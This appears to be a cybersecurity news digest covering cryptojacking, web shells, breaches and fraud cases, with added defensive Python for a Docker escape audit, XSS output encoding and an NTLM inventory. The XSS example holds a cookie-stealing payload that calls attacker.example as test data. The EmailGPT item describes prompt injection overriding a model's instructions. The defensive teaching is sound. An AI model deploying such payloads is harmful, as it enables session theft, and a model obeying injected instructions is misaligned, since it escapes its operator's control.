What are the latest cybersecurity alerts, incidents, and news?
Commando Cat, Docker, Cryptocurrency, ThinkPHP, Dama Web Shell, EmailGPT Vulnerability, SickSync, Cisco Finesse, Stored XSS Attacks, Gitloker, GitHub Repositories, Dutch Political Sites, Cloudflare, Panorama Eyecare, Office of the Maine General Attorney, Disney Server Breach, Club Penguin, Gizmodo, Bimbo Bakeries, Department of Justice, Interpol, FBI, Red Notice Sabotage, Associated Press, Microsoft, NTLM, Enhanced Security, Guardian Analytics, Webster Bank, Bloomberg, ‘Evolved Apes’, NFT Fraud, Attorney General, Southern District of New York
Cyber Alerts
The threat actor known as Commando Cat has been identified in an ongoing cryptojacking campaign targeting poorly secured Docker instances. Trend Micro researchers Sunil Bharti and Shubham Singh report that the attackers pull a Docker image named cmd.cat/chattr, which retrieves the malicious payload from their command-and-control (C&C) infrastructure. They start a container from that image and then escape its confines with the chroot command, gaining access to the host operating system.
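A chroot escape of the kind described only works when the container already has the host's filesystem reachable from inside, so the practical check on a Docker host is whether any running container has been started with a host-root bind mount, the Docker socket, the host PID namespace, or the privileged flag. The audit below is an added example written for this page, not Trend Micro's tooling or anything from the campaign; it reads the JSON that `docker inspect` emits and flags escape-capable configurations. The inspect records are constructed for the example, and the assumption that the malicious container bind-mounts `/` is an illustration of the escape pattern, not a detail the summary above states.

```python
import json

# Constructed sample in the shape of `docker inspect <id>` output, trimmed to the
# fields this audit reads. Not real data from the Commando Cat campaign.
SAMPLE_INSPECT = json.dumps([
    {
        "Id": "a1b2c3",
        "Name": "/quirky_chattr",
        "Config": {"Image": "cmd.cat/chattr"},
        "HostConfig": {"Privileged": False, "PidMode": "", "Binds": ["/:/host"]},
        "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/host", "RW": True}],
    },
    {
        "Id": "d4e5f6",
        "Name": "/web",
        "Config": {"Image": "nginx:1.25"},
        "HostConfig": {"Privileged": False, "PidMode": "", "Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
        "Mounts": [{"Type": "bind", "Source": "/srv/www", "Destination": "/usr/share/nginx/html", "RW": False}],
    },
    {
        "Id": "0badf00d",
        "Name": "/agent",
        "Config": {"Image": "internal/agent:3"},
        "HostConfig": {"Privileged": True, "PidMode": "host", "Binds": ["/var/run/docker.sock:/var/run/docker.sock"]},
        "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock", "Destination": "/var/run/docker.sock", "RW": True}],
    },
])

# Host paths that, once bind-mounted into a container, hand a process inside it
# control of the host directly (root filesystem, /proc, /sys) or via the Docker API.
SENSITIVE_SOURCES = {"/", "/etc", "/root", "/proc", "/sys", "/var/run/docker.sock", "/run/docker.sock"}

# Image name reported for this campaign (from the summary above).
KNOWN_BAD_IMAGES = {"cmd.cat/chattr"}


def audit_containers(inspect_output):
    """Return {container name: [reasons]} for every container whose config allows a host escape."""
    findings = {}
    for c in json.loads(inspect_output):
        reasons = []
        image = c.get("Config", {}).get("Image", "")
        if image in KNOWN_BAD_IMAGES:
            reasons.append(f"known cryptojacking image {image}")
        hc = c.get("HostConfig", {})
        if hc.get("Privileged"):
            reasons.append("privileged")
        if hc.get("PidMode") == "host":
            reasons.append("host PID namespace")
        for m in c.get("Mounts", []):
            src = m.get("Source", "")
            if m.get("Type") == "bind" and src in SENSITIVE_SOURCES:
                mode = "rw" if m.get("RW") else "ro"
                reasons.append(f"bind mount of {src} at {m.get('Destination')} ({mode})")
        if reasons:
            findings[c["Name"].lstrip("/")] = reasons
    return findings


if __name__ == "__main__":
    # On a real host: docker inspect $(docker ps -q) | python3 audit.py
    for name, reasons in audit_containers(SAMPLE_INSPECT).items():
        print(f"{name}: " + "; ".join(reasons))
```

The `web` container, with a read-only bind of an ordinary directory, produces no finding; the other two do. Pair this with the obvious upstream fix: never expose the Docker API on 2375/tcp without TLS and client certificates, which is the "poorly secured" condition the campaign depends on.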
Chinese threat actors are exploiting old vulnerabilities in ThinkPHP applications to install a persistent web shell named Dama. This web shell allows for extensive exploitation of breached systems, enabling remote control and further malicious activities. The campaign, first detected in October 2023, has recently intensified, targeting even non-ThinkPHP systems opportunistically.
A critical flaw in EmailGPT (CVE-2024-5184) enables prompt injection: because the service passes attacker-influenced text to the model through its API, a crafted input can override the instructions the application intended the model to follow, potentially exposing sensitive data. Once an attacker controls that logic, the path is open to further abuse, from data breaches to denial-of-service, which underscores the urgency of remediation.
The Computer Emergency Response Team of Ukraine (CERT-UA) has issued a warning regarding a series of cyber attacks directed at the country’s defense forces. These attacks are part of an espionage campaign known as SickSync, involving the deployment of a sophisticated malware called SPECTR. The agency has attributed these attacks to a threat actor identified as UAC-0020, also known as Vermin, believed to have ties with security agencies of the Luhansk People’s Republic (LPR).
Cisco has disclosed vulnerabilities in its Finesse platform that expose users to stored cross-site scripting (XSS) attacks. The flaws, designated CVE-2024-20404 and CVE-2024-20405, allow an attacker to inject script that is persisted and then served back to anyone viewing the affected pages of the Cisco Finesse web interface. Successful exploitation could lead to unauthorized access, data theft, or manipulation of sensitive information in the context of the victim's browser session.
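Stored XSS comes down to one rendering decision: whether text saved by one user is entity-encoded before it is emitted into a page another user views. The snippet below is an added example for this page, not Cisco's code and not a payload from the advisory; it shows the vulnerable and hardened renderings side by side and uses Python's own HTML parser as a stand-in for the browser to show which one still yields an `<img>` tag with an event handler. The note strings are constructed for the example.

```python
import html
from html.parser import HTMLParser

# Constructed stored inputs of the kind a stored XSS payload rides in (a saved note
# or comment). Illustrative only; not a payload taken from the Cisco advisory.
BENIGN_NOTE = "Caller asked for a callback at 3 pm."
XSS_NOTE = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'


def render_vulnerable(note):
    """Interpolates stored text straight into markup, so any tag or event handler in it runs in every viewer's browser."""
    return '<div class="note">' + note + '</div>'


def render_hardened(note):
    """Entity-encodes <, >, &, \" and ' for the HTML text context before the stored value reaches the page.
    Values placed into attributes, URLs or inline script need that context's own encoding instead."""
    return '<div class="note">' + html.escape(note, quote=True) + '</div>'


class _TagCollector(HTMLParser):
    """Records start tags the way a browser's parser would see them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parsed_tags(markup):
    """Return [(tag, {attr: value})] for the markup; a safe page contains only the author's own <div>."""
    p = _TagCollector()
    p.feed(markup)
    return p.tags


def has_injected_handler(markup):
    """True if any tag other than the wrapping div, or any on* event attribute, survived into the parsed page."""
    return any(
        tag != "div" or any(a.lower().startswith("on") for a in attrs)
        for tag, attrs in parsed_tags(markup)
    )


if __name__ == "__main__":
    for label, fn in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        print(f"{label}: payload executes = {has_injected_handler(fn(XSS_NOTE))}")
```

Output encoding is the fix that matters; a Content-Security-Policy that disallows inline script limits the damage of a miss but does not replace it.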
Cyber Incidents
Attackers are wiping GitHub repositories and instructing victims to contact them on Telegram for further information. The campaign, discovered by security researcher Germán Fernández, likely relies on GitHub accounts compromised with stolen credentials. The attackers claim to have stolen the victims' data and offer a backup in exchange for contact on Telegram.
Cloudflare detected DDoS attacks targeting Dutch political websites during the 2024 European Parliament election, the first held since the UK left the EU. HackNeT, a pro-Russian hacker group, claimed responsibility for targeting political party websites in the Netherlands.
Panorama Eyecare, a physician-led management services organization in Fort Collins, CO, has disclosed a data breach affecting 377,911 individuals, a year after a ransomware attack. The breach, attributed to the LockBit ransomware group, compromised sensitive data including names, Social Security numbers, dates of birth, driver's license or state ID numbers, financial account information, dates of service, and medical provider names.
Threat actors infiltrated Disney’s servers seeking old Club Penguin data but made off with 2.5 GB of current internal information, including details on Disney+ and corporate strategies. Despite Disney’s silence, leaked documents expose tools like Helios and Communicore, potentially jeopardizing the company’s security. The breach highlights ongoing frustration among Club Penguin fans after its closure in 2017.
On February 13, 2024, Bimbo Bakeries discovered unauthorized access to its network, including servers containing personal information. Names, Social Security numbers, and dates of birth were compromised; financial and credit card data were not affected. Bimbo Bakeries blocked the access, opened an investigation, and engaged cybersecurity experts to contain the breach and protect affected individuals' information.
Cyber News
A civil forfeiture action aims to recoup $5.3 million lost by a Massachusetts workers' union in a business email compromise (BEC) scam. Cybercriminals impersonated a trusted investment consulting firm via spoofed email and directed the union to transfer the funds. Authorities traced the $5.3 million to bank accounts that have since been seized, part of a larger nationwide effort to combat BEC fraud.
Interpol and FBI joined forces, detaining four in Moldova, disrupting a scheme targeting Red Notices, crucial for global law enforcement. The operation exposed an intricate network spanning Russia, Ukraine, and Belarus, aiming to undermine international justice through bribes and corruption. Interpol vows to safeguard its systems against further misuse, emphasizing the ongoing fight against global corruption.
Microsoft has announced the gradual retirement of all NTLM versions to harden Windows authentication against evolving threats. Developers are advised to replace direct NTLM calls with the Negotiate security package, which selects Kerberos wherever it is available and falls back to NTLM only when it is not. System administrators should audit where NTLM is still in use and plan the transition to Negotiate so that systems remain compatible with future Windows updates.
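The audit Microsoft recommends starts with the domain's own logon telemetry: Windows Security event 4624 records the authentication package for every successful logon, and `LmPackageName` carries the NTLM version when NTLM was used. The inventory below is an added example for this page, not a Microsoft tool; it groups NTLM logons by source and account so that each dependency can be moved to Kerberos before NTLM is disabled, and separately lists NTLMv1 sources, which break first when `LmCompatibilityLevel` is raised. The event records are constructed to mirror the 4624 fields and are not exported from a real domain controller; treating a logon recorded under the Negotiate package with an NTLM version in `LmPackageName` as NTLM is a defensive assumption of the example.

```python
from collections import defaultdict

# Constructed records mirroring the Windows Security 4624 fields that identify
# the auth package. Not exported from a real domain controller.
SAMPLE_4624 = [
    {"EventID": 4624, "TargetDomainName": "CORP", "TargetUserName": "svc-backup",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2",
     "WorkstationName": "BACKUP01", "IpAddress": "10.0.5.12"},
    {"EventID": 4624, "TargetDomainName": "CORP", "TargetUserName": "jdoe",
     "AuthenticationPackageName": "Kerberos", "LmPackageName": "-",
     "WorkstationName": "WS-0417", "IpAddress": "10.0.8.41"},
    {"EventID": 4624, "TargetDomainName": "CORP", "TargetUserName": "scanner",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V1",
     "WorkstationName": "MFP-LOBBY", "IpAddress": "10.0.2.200"},
    {"EventID": 4624, "TargetDomainName": "CORP", "TargetUserName": "svc-backup",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2",
     "WorkstationName": "BACKUP01", "IpAddress": "10.0.5.12"},
    # Failed logon (4625): not counted, the audit is about working dependencies.
    {"EventID": 4625, "TargetDomainName": "CORP", "TargetUserName": "guest",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "-",
     "WorkstationName": "UNKNOWN", "IpAddress": "198.51.100.9"},
    # Logged under Negotiate but with an NTLM version recorded: treated as NTLM
    # here (defensive assumption of this example, in case Negotiate fell back).
    {"EventID": 4624, "TargetDomainName": "CORP", "TargetUserName": "appsvc",
     "AuthenticationPackageName": "Negotiate", "LmPackageName": "NTLM V2",
     "WorkstationName": "APP02", "IpAddress": "10.0.6.7"},
]


def _used_ntlm(event):
    """True when the logon authenticated with NTLM, by package name or by recorded NTLM version."""
    pkg = event.get("AuthenticationPackageName", "").upper()
    lm = event.get("LmPackageName", "-").upper()
    return pkg == "NTLM" or lm.startswith("NTLM")


def ntlm_inventory(events):
    """Group successful NTLM logons by (source IP, workstation, account); keep the NTLM versions each used."""
    inv = defaultdict(lambda: {"count": 0, "versions": set()})
    for e in events:
        if e.get("EventID") != 4624 or not _used_ntlm(e):
            continue
        account = f"{e.get('TargetDomainName', '')}\\{e.get('TargetUserName', '')}"
        key = (e.get("IpAddress", "-"), e.get("WorkstationName", "-"), account)
        inv[key]["count"] += 1
        inv[key]["versions"].add(e.get("LmPackageName", "?"))
    return dict(inv)


def ntlmv1_sources(inventory):
    """Sources still negotiating NTLMv1; these need fixing before LmCompatibilityLevel is raised."""
    return sorted(key for key, v in inventory.items() if "NTLM V1" in v["versions"])


if __name__ == "__main__":
    inv = ntlm_inventory(SAMPLE_4624)
    for (ip, host, account), v in sorted(inv.items()):
        print(f"{ip:<14} {host:<10} {account:<18} logons={v['count']} versions={sorted(v['versions'])}")
    print("NTLMv1 sources:", ntlmv1_sources(inv))
```

On a real domain the input would come from the domain controllers' Security logs (or the NTLM auditing channel), exported with `wevtutil` or a SIEM query; the grouping is the same. Each remaining row is a client, service or device that must be reconfigured for Kerberos (correct SPNs, hostname rather than IP, or an updated client) before NTLM can be switched off without an outage.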
Guardian Analytics and Webster Bank have settled a data breach lawsuit for $1.4 million over allegations of inadequate data protection. The breach exposed the information of 192,000 individuals and led to claims that sensitive data had not been properly safeguarded. The settlement compensates affected individuals for financial losses and underscores the need for robust cybersecurity measures.
Three UK nationals face charges for their role in the “Evolved Apes” NFT scam, accused of wire fraud and money laundering by orchestrating a rug pull scheme. The trio’s alleged actions involved falsely promising a video game development linked to NFT sales, ultimately vanishing with investors’ funds. The indictment reveals their laundering of misappropriated funds through cryptocurrency transactions, highlighting the serious consequences of NFT fraud in the digital art market.
Copyright Β© 2024 CyberMaterial. All Rights Reserved.